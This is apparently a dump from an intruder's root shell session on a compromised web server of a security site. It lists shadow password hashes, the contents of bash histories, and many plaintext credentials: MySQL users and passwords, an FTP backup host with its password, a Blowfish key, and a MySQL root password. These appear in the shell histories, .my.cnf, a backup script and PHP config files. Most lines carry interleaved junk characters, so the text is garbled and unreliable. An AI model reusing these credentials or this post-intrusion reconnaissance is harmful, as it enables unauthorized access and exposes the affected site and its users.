com1$jEZ62nri$aDTj.1REsrYePcPBdfOQz1:13780:0:99999:7:::) y- E& G0 o+ P/ Y8 o) ^; J
astanet1$YniJLAr.$NKtPNNGK9mcmz3/mLMSWC1:14235:0:99999:7:::! j5 j( s! [% c: i# w! C
! s+ g# M! _. U. V
sh-3.2# cat /etc/motd
" }: r! u% i P#####################################################
& s( d0 [+ G. O( F9 C% M#____ ____ ___ ____ _ ____ _ _ _ ____ ___ ____ #
7 t7 V3 y( R( v, ^" F) b# w$ Q# |__| [__ | |__| | |__| | | | [__ | |__| #5 z. U, Z* g1 i! U! t
# | | ___] | | | |___ | | \/ | ___] | | | #
. V5 x: |; i9 T" M" B4 m0 r2 A# #
) S: ]. J; Y8 R$ c#####################################################
; M/ C" }# R2 A( ?# _$ ]3 E# #
. t) z2 _2 o, V7 S& k% \. Z3 I* x* I8 ^6 R# Admin Contact - 链接标记support@secureservertech.com #
: B4 ]6 j/ [- U+ T# #
/ m3 n! i+ v3 |. B) c% D# Available ShortCuts #( l% d- _6 K5 I& I9 \
# #3 o) |% D2 S& c. ?/ g9 c3 Z
# nst - list active connections #
U" k+ Y: K1 Z: {9 {2 S0 F# ddos - shows how many times each ip is connected #7 N( o$ d3 G6 r, C
# ltr - restart the webserver #. l9 ]5 E w$ a7 y7 {" T
# phpc - edit the php config file ## {# i9 A: i' d. l7 I
# htc - edit the webserver configuration file #& L* S% { |5 i
# up - uptime #
2 M6 B+ j0 j; M+ B. }# etd - edit the motd of the day file #$ x+ S, q! l! i( g% Z9 w" l
# htr - start and restart apache if needed #
1 b) R+ w" j5 l+ v# syng - shows active SYN_RECV connections #
) @: f" K0 H9 v% _% v# synd - syn flood blocker - “synd -h” for usage #
; {1 H9 v6 q4 ^6 Q5 c1 u- w#####################################################( L2 G8 v- H6 u! ~5 {
# NOTES: #
3 U% P0 E9 \4 ~# Last Upgrade - 12-08-2008 by JF #
) C& y$ t7 z' U, k# My.cnf/Mysql Optimization - 1-28-09 #
( C+ c! i' k0 y! S8 O# #5 j) n4 b. Y6 K+ U
# # \6 i3 D8 _* s6 [% b+ H
# #
1 m( i! N9 }) [) j: R( W/ |#####################################################- V# y8 a3 [, T2 p
4 ~# u( U9 V' e, D: Q% Y. jsh-3.2# lastlog | grep -v Never5 b5 C Q9 d" O: R, i, [ Q
Username Port From Latest: a. j0 l) H- O! f* y- o
root pts/1 adsl-194-162-fix Thu Jun 4 07:19:14 +0000 2009
/ |6 z; {) W. }! f6 Jadmin pts/1 cp.secureservert Thu Mar 20 10:25:39 +0000 20080 d) s- Q* b# x2 o" D
com pts/0 cust.static.212- Tue Jun 2 07:46:30 +0000 20098 B" R2 X/ ?) E, F6 S% u
astanet pts/0 adsl-194-162-fix Thu Apr 16 08:20:44 +0000 2009
3 P7 n, i# m j" G; l5 f
$ ? n3 ~; U9 ?+ V( ~( }sh-3.2# ls -la- a( u Q* e6 D: j/ u# k
total 453376/ b O u4 K4 C7 c! o
drwxr-x— 15 root root 4096 Jun 4 08:40 .
. U; ^7 i8 e" E% W; O; D7 b: Z# hdrwxr-xr-x 25 root root 4096 Jun 3 02:43 ... F% T \ T0 N# G3 x. t% e
-rw-r–r– 1 root root 2394400 Oct 19 2007 10mbtest.zip
" O! G2 B! ?2 f; Z# Z2 @% }# a-rw——- 1 root root 1006 Sep 11 2007 anaconda-ks.cfg
# a9 H* W! N# x/ {. f- V-rw——- 1 root root 16836 Jun 4 07:21 .bash_history
: \2 n @) M. O w: s# p# i" \-rw-r–r– 1 root root 24 Jan 6 2007 .bash_logout: j3 f3 e+ b, K3 k9 Z4 N
-rw-r–r– 1 root root 191 Jan 6 2007 .bash_profile( B e( Q% K5 D3 ]
-rw-r–r– 1 root root 176 Jan 6 2007 .bashrc
$ B! I# C: H' z- z-rwx—— 1 root root 1899 Oct 28 2007 bk.sh
6 `9 S0 y( L0 X/ `-rw-r–r– 1 root root 1327 Nov 29 2007 cert
$ M C& s! V* {. M E% K% u-rw-r–r– 1 root root 139860821 May 14 2008 contrexxbackup_20080514.sql
5 m/ K) {* y" O' M0 r" O9 odrwxr-xr-x 4 root root 4096 May 20 2008 .cpan
; u. _# A9 J! Y: s! U% P4 Z-rw-r–r– 1 root root 100 Jan 6 2007 .cshrc9 Q$ X% X0 m- ?) \5 n9 U
-rw-r–r– 1 root root 323079 Mar 31 13:48 defaultp_ports.sql2 ~" s$ d0 J* c) D8 G, k9 D" @/ e
drwx—— 2 root root 4096 Oct 28 2007 .elinks
/ Y3 h3 {, D9 W, cdrwxr-xr-x 13 root root 4096 Mar 21 2008 gdb-6.7.1
; @# J0 {! r# |# h-rw-r–r– 1 root root 15080950 Oct 29 2007 gdb-6.7.1.tar.bz26 m; _5 c5 x8 h. j
-rw——- 1 root root 0 Apr 16 13:19 .history
( q7 A" |& w3 V2 F$ _* E( s-rw-r–r– 1 root root 16095 Sep 11 2007 install.log
. _9 m5 O$ ^$ O9 i. E. e" t, Z-rw-r–r– 1 root root 2566 Sep 11 2007 install.log.syslog9 ~" \8 {' v; {4 R0 Y( o9 k
-rw-r–r– 1 root root 1003 Jul 22 2007 install.sh
8 F3 a4 i/ U9 k9 r( g. O* w-rw——- 1 root root 35 Jun 2 14:23 .lesshst% ~# f4 @% n2 r5 {3 X: |" C' b
drwxr-xr-x 2 root root 4096 Dec 29 2007 .lftp$ y$ h3 [5 T5 [: z" i3 `1 G
drwxr-xr-x 10 root root 4096 Sep 14 2007 linux-2.6.19.2-grsec
/ Z, L2 u3 R( G7 W, t: l2 W+ o-rw-r–r– 1 root root 94979336 Feb 16 2007 linux-2.6.19.2-grsec.tar.gz
4 l$ ~. r$ l# y8 f+ `6 D0 a-rw-r–r– 1 root root 4737058 Sep 22 2007 linux-2.6.22.tar.bz2
+ l7 a: x8 z. q7 x; e-rwx—— 1 root root 760 Sep 18 2008 lp* [; ?! Y# {! p8 C9 F
drwxr-xr-x 12 root root 4096 Nov 30 2007 lsws-3.3.1
/ o) N4 p( e# `5 h-rw-r–r– 1 root root 2480045 Nov 30 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz3 a+ R2 |7 g, O0 B9 }
-rw-r–r– 1 root root 6388501 Nov 29 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz.1/ C1 K! K& H' q8 ~+ S
drwxr-xr-x 12 root root 4096 Mar 21 2008 lsws-3.3.9
/ s( d+ Q1 m( B6 T) t-rw-r–r– 1 root root 6437577 Mar 21 2008 lsws-3.3.9-ent-x86_64-linux.tar.gz
4 d( P7 j$ x9 Z9 g! V) |drwxr-xr-x 12 root root 4096 May 29 15:10 lsws-4.0.33 k( l) H. [0 |- ?5 u% m
-rw-r–r– 1 root root 6496050 May 8 05:59 lsws-4.0.3-ent-x86_64-linux.tar.gz I. b1 Y2 Z5 Y" o5 G; {" N* Z4 O
-rw-r–r– 1 root root 25316 Feb 15 2006 mybk.sh
: I0 }- p7 r6 X6 \" g2 M" c6 f2 \* ~-rw——- 1 root root 41 Oct 19 2007 .my.cnf# N- U2 I/ L* U6 Y0 M3 l
-rw——- 1 root root 2902 Jun 4 08:40 .mysql_history7 ?) D" c( }, T0 ]- y, r
-rwx—— 1 root root 38873 Apr 16 2008 mysqlreport9 d/ S4 c* [5 [& o* `/ h
-rw——- 1 root root 41 May 20 2008 .mytop, |3 }8 R, L* I
drwxr-xr-x 3 1000 1000 4096 May 20 2008 mytop-1.6' P8 y1 u- X) Z
-rw-r–r– 1 root root 19720 Feb 17 2007 mytop-1.6.tar.gz t; C, M% |* a) h
drwxr-xr-x 2 root root 4096 Oct 28 2007 .ncftp% V2 ~6 J$ Q* D" t
-rw——- 1 root root 1462 Sep 21 2007 opt.php+ ~$ I3 X9 w+ L* ^
-rw-r–r– 1 root root 3371 Sep 22 2007 p
% \! F4 N. v% i) z9 q8 s& s0 O-rw-r–r– 1 root root 7608429 Aug 30 2007 php-5.2.4.tar.bz2% D% Z A. V; ?5 z5 Z( V3 G: ]& q, J
-rw——- 1 root root 1024 Feb 3 21:32 .rnd
; T% w2 m5 g: q" W2 c-rw-r–r– 1 root root 716 Nov 28 2007 server.csr8 a! V& q' g4 k/ e* m/ N4 G2 b
-rw-r–r– 1 root root 887 Nov 28 2007 server.key
8 r5 Z7 q, T, e) h4 l, {drwx—— 2 root root 4096 Oct 10 2008 .ssh
$ x3 m6 @; s: M-rw-r–r– 1 root root 44227 Oct 28 2007 tar-inc-backup.dat4 U- x W8 T" H7 A0 _( \
-rw-r–r– 1 root root 129 Jan 6 2007 .tcshrc
! R! S* V* I, `# q9 R-rw-r–r– 1 root root 104874307 Oct 17 2007 test100.zip
7 q7 p$ I+ q( i+ k& N-rw-r–r– 1 root root 67085540 Oct 19 2007 test100.zip.1- t- r( Q8 r& h" s
drwxr-xr-x 2 root root 4096 Apr 29 11:15 tmp
# b3 q/ S7 l+ h-rw-r–r– 1 root root 42596 May 21 2007 tuning-primer.sh
% Y/ @" ~0 }, B% u3 Udrwxrwxrwx 19 1000 users 4096 Mar 21 2008 valgrind-3.3.0! ` o8 ?8 G7 X D7 j* m2 H* `
-rw-r–r– 1 root root 4519551 Dec 11 2007 valgrind-3.3.0.tar.bz2
# ?# B2 S4 r9 [) Z2 o5 F6 ~-rw——- 1 root root 12997 May 16 2008 .viminfo
# ^7 o- ^. p# D T! p4 m0 ?
5 p& W! ^: P Ysh-3.2# cat .bash_history$ v$ b0 m5 w7 J, {% Q/ D% N
[snip]
4 L# W- K4 I% y9 R3 o6 y- X rwget cp4sst.com/sstlinux.tar.gz" D( V( N' f( ]" r2 A+ ^; A. n
tar zxvf sstlinux.tar.gz2 P8 m }2 E* M2 }9 _0 }3 S0 k
cd linux-2.6.27.10
% `! j# u2 `6 W: M. L+ A; `sh install.sh' i; w$ ]/ Y4 v
make bzImage ; make modules ; make modules_install ; make install
$ K0 e2 f- l0 h1 G# o0 A3 Gmake clean
2 G& M' k ~ Z9 U" Qservice mysqld restart
& N! s; }! \- x2 ]1 q[snip]
3 O- a2 R" ^+ i9 v! Gcd /usr/sbin/
) l/ |2 ^ y# o% O O2 qchmod 4777 traceroute
" j& L9 {3 }1 F- g. ~1 U! nchmod 4777 ping
( D; x7 x5 X! s4 b9 w( Ctraceroute -I 链接标记[url]www.astalavista.ch[/url]6 `6 j9 x" ~% z& {. p# |) s
[snip]; H+ e- n2 R0 b, c: i$ r6 Q9 K
vi /etc/csf/csf.conf( ~5 y% }% P8 J C3 w! Y
traceroute google.ch
$ P' @% h) c- D# r( |+ Fservice csf restart
3 D q8 V1 Z3 {' O, Ytracert google.ch) P! ~% N6 A" R
service csf restart
7 B2 X4 E0 z9 \7 X8 m$ h5 Btraceroute 链接标记[url]www.google.ch[/url]
% E4 T2 q2 g! t3 Y8 _0 `tracert 链接标记[url]www.google.ch[/url] r, G9 A/ ]" X: {" t" R. Q* m
traceroute 链接标记[url]www.google.ch[/url]6 C$ a8 @% y* F, s6 g, t* n$ x6 P
locate traceroute) l# s7 U8 L: B% [- `1 d$ P
chown 4755 /bin/traceroute- a0 f: t% i! q1 M: J% P
chown 4777 /bin/traceroute3 l) F, S0 Y ? Z/ a9 l E
locate ping% G7 D6 A% r, h/ \( w
chown 4755 /bin/ping
0 }. G3 t: A! Schown 4777 /bin/ping# ^ W6 n D* j, a; @
cd /bin/! i! j8 K% G; V: P
ls -ali | grep ping
3 y( c5 W3 `& z8 echown root ping
- h6 G5 w, g+ m+ p( w# \chmod 4755 ping$ t) k# K8 ]) Q0 i$ K
ls -ali | grep traceroute
( J4 @* m1 Y% I c3 j' ~ Hchown root traceroute$ j _. k! D, r+ n
chmod 4755 traceroute
0 Z9 u B" Y+ }' b- y# x: ?6 Ols -ali | grep traceroute
, D$ y! I% W4 ^+ ]& y' c/ ptraceroute -I 链接标记[url]www.google.ch[/url]" q/ O$ W0 w, v( e5 Q I
traceroute 链接标记[url]www.google.ch[/url]. Y# }/ d9 j6 L! d6 ?$ d9 w7 B4 w
whois pmsantos.ch
% \, B$ S5 l- K9 b \1 M. @[snip]4 P2 _/ d4 B% }. W( Z& f- _% c
mysql -h com_contrexx2_live < /root/defaultp_ports.sql
: c ~3 S* d4 K) Y1 L3 |9 h1 `( Pmysql -h -ucontrexxuser2 -p0fEYNZgXz1pKe com_contrexx2_live < /root/defaultp_ports.sql
2 v9 @, |( X- t& S- Wmysql -h -u contrexxuser2 -p com_contrexx2_live < /root/defaultp_ports.sql
G5 T8 X% K9 p$ A0 s* {* Pmysql -h localhost com_contrexx2_live < /root/defaultp_ports.sql
' \3 z, E3 v/ A% K# Dtop
5 S& D& T) |9 D( ~, Aping ssth.ch. H- Q$ l2 h# i" r- h
ping asdlkfaljgasd???ljg???lasj.ch
+ H8 _+ r! a1 e# X2 jping asdlkfaljgasdlasj.ch
+ R5 Y: l: d5 e) bping 链接标记[url]www.ssth.ch[/url]
4 _4 N" K4 s3 W( t0 X( fping ssth.ch
/ F5 E; N+ a. u8 J' enslookup 链接标记[url]www.google.ch[/url]
; @( C1 L$ M5 S' }nslookup 链接标记[url]www.ssth.ch[/url]
. K1 q: Y' F% f$ yman nslookup9 H- _/ K+ F) J2 M
ping 链接标记[url]www.google.ch[/url]
5 v' W' E/ P4 v: V8 j+ X; Hnslookup 链接标记[url]www.google.ch[/url]
& m6 ?* k6 T/ L, [nslookup 链接标记[url]www.google.ch[/url]1 }( c1 v$ f$ t1 X5 K3 w7 X
nslookup salfjasdlf.ch
( r {; B' p! E1 X; c6 O[snip]
% |, Y' ]1 {/ P) Sopenssl passwd -1 sadf% E* L% R$ c# Y: c6 R
openssl passwd -1 5cZNHstdTy2 I* J8 }! v# J& h0 P
mysql# p! [( B" h, \, F: y
mysql
4 _+ ]9 g0 p& Z: P9 Clocate proftp8 d2 }0 P- N( x) w! W: K+ t
vi /etc/proftpd.passwd
! {9 _8 K4 q! xservice proftpd restart! a4 d2 w- l' _
locate proftpd.conf, G; m( r# n: ^( I: o
vi /etc/proftpd.conf3 \8 G5 ?0 b1 k# _
vi /etc/proftpd.passwd
5 v' ]& O; \. T- O4 g0 K/ Nservice proftpd restart
- s8 R9 ~( ^0 W% h; G[snip]
: ?4 L- ]- \! ?$ l' k/bin/sh /home/com/backup_system/backup.sh/ z- F2 ~) Q9 s6 P" ^
tar cfv /home/com/backups/09-04-28_backup.tar /home/com/public_html/admin5 `2 _. C7 P' F C
mysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2_live > 09-04-29-com_contrexx2_live-full.sql- T6 o! a: W3 o* y+ l2 {4 {$ W
mysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2 > 09-04-29-com_contrexx2-full.sql. q$ d( [/ o+ [$ D
ls -ali2 s. F# D. ]1 |7 ]
mysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS com_contrexx > 07-04-29-com_contrexx-full.sql& o: A4 k7 u7 j5 j( Q
mysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS ideapool > 07-04-29-ideapool-full.sql
& x/ W+ A% K3 X' _, |, ]crontab -l4 q0 g8 A3 D& A
crontab -l
$ ?" q* [6 x! e1 K% ?- kphp -q /home/com/public_html/modifications/cronjobs/securitynews.php+ i) ?9 t8 p* f0 i4 `" ^3 x
/home/com/public_html/modifications/cronjobs/exploits.sh& |( ` `" a/ ~' C0 m
wget 链接标记[url]http://www.litespeedtech.com/pac ... x86_64-linux.tar.gz[/url]* o3 a5 ?% D7 ]7 a) e
tar zxvf lsws-4.0.3-ent-x86_64-linux.tar.gz
7 Z) G" R/ s6 G1 N* l8 H4 Qcd lsws-4.0.3 b& A! x4 p7 ~ ~& h
sh install.sh
% b+ Y/ M$ n$ z @! T* i# D" Zuptime
" J2 D' f7 Z5 l G' W; Yhdparm -tt /dev/sda
0 l7 G9 W5 B; P! ?' n7 Z6 Iiostat+ F% k! s+ o/ y1 `% q5 w
yum install iostat) H0 G: k4 `* ^; i( J
iostat* G4 _0 o! S' t+ C
whereis iostat2 w* `+ J# J6 S5 i9 y, g
yjm clean all$ c1 b# n" p0 ~# _. I- X8 u
yum clean all ; yum -y update. W% Q0 `8 u- r# k. Z7 U+ S
iostat
; V3 u. [# r( R0 jyum install systat. A! \; Y0 y$ T: x, g- }
rpm -qa | grep iostat
/ S* N( t7 k/ k' x- |& `7 Nrpm -qa | grep sysstat
5 c, K, T3 l1 `$ G' F/ p/ p2 D7 R4 drpm -qa | grep systat
9 U: v4 a8 {$ f- ]/ L; A1 P; `3 ~/ tdmesg -c# W3 ~9 v+ a6 T9 A
sysctl -p5 M& \. n9 }. T3 A0 H/ M- H( x3 }
uname -r2 h! x9 u) E* e3 i: I9 M
cd /usr/src
; C2 T) i* t/ `2 F9 S& {& ?2 twget nix101.com/kernels/sstlinux.tar.gz/ k. \2 Y% K$ B% f
shutdown -r now4 ^; S3 }( b; |4 V5 i& W
nano -w /boot/grub/grub.conf7 X+ V2 u6 c" S$ V" F
0 ? j- ]# Y f; a* K) B; k/ b
sh-3.2# cat .my.cnf
& i8 o/ N$ a9 _- r; b( Z[client]7 Q2 l7 r& c q" T0 {9 u, I
user=da_admin
, B: w* [ s4 n4 n* Npassword=X9dctmRH
2 w) ]+ g5 w1 l# T4 S/ v3 K! i/ ^ M4 r! g) ]- @
sh-3.2# cat /home/com/backup_system/backup.sh
* O; x- M- `3 X+ ]8 [#!/bin/sh# q7 I* G" [ K5 t
#####################################################################
( R& f# t- q5 ?+ H# #
, y7 `7 \( x1 V- s m- o# incremental backup for astalavista.com #* `0 U4 A z0 V0 z0 v) ]2 }
# #. {5 E# ]9 K& h8 T( m
# author: Paulo M. Santos <链接标记paulo.santos@astalavista.com> #
/ V. g8 I* F% V7 a; O5 O% n# #% h8 P/ H- T6 J
#####################################################################
' j7 x$ V( T, W0 s[snip]
) w8 a+ m) k$ gPROG_DIR=”/home/com/backup_system”;
" Q1 M C- _/ u' x) zBACKUP_DIR=”/home/com/backups”;
: C' L) F# p$ `3 pDOBACKUP_FROM=”/home/com/domains/astalavista.com/public_html”;1 W% l i$ L7 J+ \6 W
# ftp for synology backup server( X: {. m% k$ E2 O$ E
FTP_HOST=”212.254.194.163″;
! {- I* L- a. d( k& ` z. OFTP_PORT=”21″;# a1 `# H9 n4 E
FTP_USER=”astalavista.com”;
% m$ y M+ o2 n* J8 VFTP_PASS=”yWHOJbzpWTWC6Xrmg1WnfBk5V”;
! F, P% D x% J8 r0 I+ h3 b0 y2 YFTP_DIR=”/astalavista.com”;% `: k1 ^7 ?6 v9 i
# database9 k% C7 n( L5 U
DB_HOST=”localhost”;
8 J/ }- W; Z$ S) o" JDB_USER=”contrexxuser2″;
% e* V4 a$ O) Y: u8 ?# ?5 ODB_PASS=”0fEYNZgXz1pKe”;
. e* [. X. P' V; y+ e5 ^DB_DATABASE1=”com_contrexx2_live”;' Q- h# k6 M( F" A
DB_DATABASE2=”com_contrexx2″;0 c$ P: K2 a- q. _% Q
[snip]; k% `- K1 o' F2 o" f4 u4 T( E
ftp -in $FTP_HOST $FTP_PORT <<EOF
+ H; p! R- U& Wquote USER $FTP_USER
; R1 C& Z0 N/ T: mquote PASS $FTP_PASS
0 T6 u8 w( w1 m3 E: ~cd $FTP_DIR7 @) v9 ~5 t4 ~" i3 K
put $DB_FULLNAME-SQL_Dump.tar: ~; v+ d+ O5 f) M8 P2 G" B$ ]
put $BACKUP_FULLNAME-Public_HTML.tar/ {$ J5 R+ G) C' S* U5 _
close
. F' W d' O4 ^) y* o- ebye" L) _5 [! a/ E" I
EOF5 {( _6 E# k) n4 E) O1 O
( T6 i0 T: P9 G% i; V! @- E8 f9 Zsh-3.2# cd /home8 x' I# B- [+ D) K* l
sh-3.2# ls -la6 \7 p4 u3 m7 K' q; J d( l. z
total 120
9 i4 c6 q& m* C' [! ]" Wdrwxr-xr-x 14 root root 4096 Mar 11 17:56 .+ t8 ~" ^3 u' b4 L" U4 f! D+ h
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
: x8 |; l6 R4 P5 T, {drwx–x–x 9 admin admin 4096 Nov 28 2007 admin
! g- V$ `- ^7 }& R1 i6 {-rw——- 1 root root 8192 Jun 4 03:03 aquota.group
6 Z( y& {+ j# n2 n/ u! L-rw——- 1 root root 8192 Jun 3 02:45 aquota.user) S! j& l; I @# `9 {& d1 Z
drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 astanet
4 N+ w. r* C& B: J' i4 c5 kdrwxr-xr-x 2 root root 4096 Jul 29 2008 backup
$ ? @* l% }5 Hdrwxr-xr-x 2 root root 4096 Sep 17 2008 backup.14161, [3 i: ~7 H& p/ K( b; {
drwx–x–x 10 com com 4096 Apr 28 12:40 com! p( J+ ]( l* S3 u2 q0 ?
drwxr-xr-x 2 root root 4096 May 17 2007 ftp% G( Q9 }5 D3 ~+ L
drwx—— 3 jon jon 4096 Sep 21 2007 jon
( @1 a- f1 r' ~$ H) _2 Adrwx—— 2 root root 16384 Sep 11 2007 lost+found
/ k9 B! e+ a5 K7 k+ L- ldrwxr-xr-x 2 root root 4096 Sep 14 2007 my
1 a0 w6 {3 t6 F; ]" Qdrwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata3 D& Z6 o7 `* k
drwx—— 2 jon jon 4096 Sep 15 2007 test1 S% ~9 H; a; z2 z: D
drwxrwxrwt 2 root root 4096 Jul 29 2008 tmp, ~* { }+ u8 `, e
4 A, n' x. g4 C( _3 hsh-3.2# cd admin
1 a- [ h' o. |1 [# H0 M* _1 rsh-3.2# ls -la
/ P$ O! v& ]; s7 g" ~% y+ v& |total 1735896
. O7 h& [( l* d/ S9 ~$ N0 pdrwx–x–x 9 admin admin 4096 Nov 28 2007 .( N* Q. J' E2 A; c0 D
drwxr-xr-x 14 root root 4096 Mar 11 17:56 .." L7 A2 C( ?( I' g% u0 x2 j! P
drwxrwxr-x 2 admin admin 4096 Oct 25 2007 admin_backups
& r/ d0 v2 S I" t; V1 x3 Kdrwx—— 2 admin admin 4096 Sep 28 2007 backups
& u- N ]3 V7 B# B7 K: v. g-rw——- 1 admin admin 860 Sep 17 2008 .bash_history
7 u- x |$ N- W- M3 u: G6 c-rw-r–r– 1 admin admin 24 Sep 14 2007 .bash_logout* s2 @1 ~/ Z% u5 |+ ~, B! R4 o
-rw-r–r– 1 admin admin 176 Sep 14 2007 .bash_profile
! b" n! c" x+ O7 [: S-rw-r–r– 1 admin admin 124 Sep 14 2007 .bashrc; s4 z% R# S% q* J K. a8 A3 q
drwxr-xr-x 2 root root 4096 Sep 28 2007 com_backups
! R! D9 f' g4 i5 C) cdrwx–x–x 6 admin admin 4096 Sep 21 2007 domains
) r! g* T; o. a9 M) Xdrwxrwx— 3 admin mail 4096 Sep 21 2007 imap* t3 E$ W+ e! I. B$ k& k' y
-rw-r–r– 1 root root 24 Sep 21 2007 info.php
/ Y5 f& ~% h5 xdrwx—— 2 admin admin 4096 Sep 21 2007 mail3 |6 y% C; G* c* ~6 d
-rw-r–r– 1 root root 716 Nov 28 2007 server.csr
/ A. G7 L1 W: U, \0 `-rw-r–r– 1 root root 887 Nov 28 2007 server.key! ^5 k) e$ A# g) R1 H# }9 [5 |( c- k
-rw-r—– 1 admin mail 34 Sep 14 2007 .shadow- ]$ b M7 X7 o3 z& M
-rw-r—– 1 admin com 1775711054 Oct 25 2007 user.admin.com.tar.gz
; Y" f1 W, S% d' g9 B) j% rdrwx–x–x 2 admin admin 4096 Jul 29 2008 user_backups4 i+ ^# O/ o, ~1 c, t0 ?
`: ~6 P7 I! S3 s) F1 Dsh-3.2# ../ a- B0 J; o5 m* F" W( x z2 v
sh-3.2# cd jon+ d q/ O9 U9 j- I
sh-3.2# ls -la( J% q j4 V. f# r
total 361 }) ^/ b0 h5 N, z, I
drwx—— 3 jon jon 4096 Sep 21 2007 .
/ x5 R% \8 D4 x# K5 vdrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
/ t ~' A5 `% Y/ z4 k8 ?7 D( t-rw——- 1 jon jon 53 Sep 21 2007 .bash_history
5 W$ F$ R; d) G/ K" n-rw-r–r– 1 jon jon 24 Sep 21 2007 .bash_logout) D1 ]9 s& X9 q5 b0 @/ H) W
-rw-r–r– 1 jon jon 176 Sep 21 2007 .bash_profile
/ Y3 ^/ [8 I, F) y. i' [' S-rw-r–r– 1 jon jon 124 Sep 21 2007 .bashrc( p4 f$ i( z' O3 Z
-rw-r–r– 1 root root 24 Sep 21 2007 info.php Z% G+ x3 N J6 n( A; q7 f# k
drwxrwxr-x 2 jon jon 4096 Sep 21 2007 public_html
- Y7 n) C$ t# U7 n
( m) Z0 H( r9 K" R+ `% ]" ^sh-3.2# cd ..
/ D' ?. O$ x5 @- [) Ssh-3.2# cd test
5 }: L% I: j1 p3 hsh-3.2# ls -la
/ ?" q* A; Y' s$ a$ ~1 Z$ k0 \total 488 p$ `1 S( @: N" G @/ z) I
drwx—— 2 jon jon 4096 Sep 15 2007 .
/ N- }; V( [2 P6 j' O0 kdrwxr-xr-x 14 root root 4096 Mar 11 17:56 ../ ]6 R9 n0 g9 q) @+ n
-rw——- 1 jon jon 79 Sep 21 2007 .bash_history
$ ~, X: r2 o$ y; W-rw-r–r– 1 jon jon 24 Sep 15 2007 .bash_logout
0 E& }3 A; E: s-rw-r–r– 1 jon jon 176 Sep 15 2007 .bash_profile' D4 q4 A$ {* }5 s" b
-rw-r–r– 1 jon jon 124 Sep 15 2007 .bashrc
: n% g) p0 A3 P: \% y% }* Nsh-3.2# cat .bash_history/ m# M. o2 D, Z9 l5 Q M: N$ B5 B2 E
/usr/bin/mysqladmin -u root password PoliuJhytg67
: r5 X n6 o5 |% x% e# Y) G9 L3 K( D: s, ?% ^5 s+ D
sh-3.2# cd ..
$ l- \( r3 N0 \1 i0 a* x A7 p6 ash-3.2# cd astanet9 |6 }* a+ Y" y; w9 d
sh-3.2# ls -la( R2 g h+ j% M! E
total 52
L$ O& ~7 P7 W& z' V' Edrwx–x–x 6 astanet astanet 4096 Jun 4 09:51 .
4 {; T9 S# N3 b6 m# d1 ]drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..' y( O9 Y6 P& ?: \% X, y6 H
drwxr-xr-x 2 root root 4096 Dec 23 16:00 auth
0 ^1 \- E$ G7 F" t! u-rw——- 1 astanet astanet 3892 Apr 16 12:14 .bash_history. _4 R7 S& j8 L; r |3 F8 h) M
-rw-r–r– 1 astanet astanet 33 Dec 17 21:50 .bash_logout
/ B& H# \: o1 F( _" R-rw-r–r– 1 astanet astanet 176 Dec 17 21:50 .bash_profile
; Z. U$ E6 f, }# @-rw-r–r– 1 astanet astanet 124 Dec 17 21:50 .bashrc, H4 l+ P+ J& |% c
drwx–x–x 3 astanet astanet 4096 Dec 23 12:18 domains8 o! O/ h/ c: o, ?
drwxrwx— 3 astanet mail 4096 Dec 23 12:18 imap
; b8 W" w C0 i5 O' P, ]& ~drwx—— 2 astanet astanet 4096 Dec 23 12:18 mail0 N0 N8 x' V' o7 M% D/ R0 ~
-rw——- 1 astanet astanet 197 Jun 4 09:51 .mysql_history
9 ^* f! f8 L3 ^, _. Rlrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html1 J! Z5 f2 ~2 p; m" n( Z
-rw-r—– 1 astanet mail 34 Dec 22 12:41 .shadow0 ]& F, _8 W( j" @- O' v
7 O1 P" R/ m i+ {, P rsh-3.2# cd auth/4 Q6 ~5 S$ q1 ^
sh-3.2# ls -la
- m2 g( T$ Z& v1 S* Q \total 28( C6 }' H! y/ o! [" G
drwxr-xr-x 2 root root 4096 Dec 23 16:00 .1 u& R" j; G. w7 H% V. H+ \9 |% E
drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 ..; @2 Z3 O$ Z: t' Y
-rw-r–r– 1 root root 321 Jan 5 2006 hackercontest.config.inc.php3 y5 [+ E5 A. u! V$ H& x/ b
-rw-r–r– 1 root root 319 Jan 5 2006 hosting.config.inc.php
$ j I4 b! k4 ]-rw-r–r– 1 root root 24 Jun 4 09:38 .htadm_pwd) N2 l" H! @, x( i
-rw-r–r– 1 root root 49 Jan 5 2006 .htpasswd_newhosting1 v4 ]. L* D6 p! C/ N. }& K N
-rw-r–r– 1 root root 51 Oct 11 2006 .htwebalizer_pwd
' q+ u j# [7 M) k5 l# W' D& [4 [& f5 U, n9 \0 t
sh-3.2# cat hackercontest.config.inc.php7 [# `; z. x9 Q' i& U. y( R
<?PHP
0 h& Q% d5 N4 a' Z! A t( p6 E& _// Variabeln f?r Verbindung zur Datenbank //1 U5 d0 d" @; a2 M8 C6 e9 ?9 `% u
$conxHost = ‘localhost’; // MySQL hostname0 }/ e" q+ b( D
$conxUser = ‘hackercontest’; // MySQL user) b* x7 E; b5 D) p! L ]
$conxPassword = ‘K6m@7dUc’; // MySQL password
. Z/ d% }& o3 z/ w0 [6 D: c' S$bfkey = ‘cXvB3981′; // Encryption/Decryption Key for Blowfish; v4 p" Z* r8 E6 b5 |
?>
9 M$ t* U0 \4 Q$ I; m* i/ z: }sh-3.2# cat hosting.config.inc.php6 X8 [5 Y/ ~* M$ i& o
<?PHP
% b9 ], }1 U W/ ?: _+ \: ]2 x// Variabeln f?r Verbindung zur Datenbank //
! ?+ ^4 `1 y5 `9 n1 ]# | G$conxHost = ‘localhost’; // MySQL hostname# t/ H7 h& V& L
$conxUser = ‘hostinguser’; // MySQL user
, `) f# ~8 q' ?/ @9 `$conxPassword = ‘cXvB3981′; // MySQL password" s- _/ c# |" Z9 Q9 h! s
$bfkey = ‘cXvB3981′; // Encryption/Decryption Key for Blowfish# b# y$ G" @+ u9 V
?>
0 l( r( r; n- t+ u. s# U a1 Q- J+ L k& O, l
